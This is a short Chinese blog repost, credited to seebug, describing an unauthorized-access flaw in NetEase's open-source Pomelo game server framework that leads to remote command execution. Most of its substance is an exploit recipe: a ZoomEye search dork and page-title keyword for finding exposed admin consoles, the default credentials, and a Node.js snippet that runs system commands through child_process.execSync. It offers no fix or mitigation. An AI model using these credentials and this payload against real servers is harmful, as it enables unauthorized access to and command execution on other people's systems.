网易开源Pomelo游戏服务端框架未授权访问导致远程命令执行

转载 seebug  2019-01-08 16:39  阅读 192 views 次 评论 0 条

Pomelo是一块网易开源基于 Node.js 的游戏服务端框架,其基于 Node.js 的高性能、分布式游戏服务器框架。它包括基础的开发框架和相关的扩展组件(库和工具包),可以帮助你省去游戏开发枯燥中的重复劳动和底层逻辑的开发。

Pomelo 不但适用于游戏服务器开发, 也可用于开发高实时 Web 应用,它的分布式架构可以使 Pomelo 比普通的实时 Web 框架扩展性更好。

zoomeye dork: Pomelo

敏感信息写在JS文件里,默认账号密码是

monitor:moniter

命令执行:

利用node.js中child_process模块执行命令

 

Title关键词:Pomelo Admin Console Web

nodejs脚本命令代码:

var a='[{"a":1}]';
var exec=require('child_process').execSync;
var cmd='whoami;ifconfig';
result=exec(cmd);
result=a.replace('1',result.toString());

 

本文地址:https://www.sk15.net/archives/146.html
温馨提示:文章内容系作者个人观点,不代表墨染流年,画出你我对观点赞同或支持。
版权声明:本文为转载文章,来源于 seebug ,版权归原作者所有,欢迎分享本文,转载请保留出处!
高性能云服务器特惠

发表评论


表情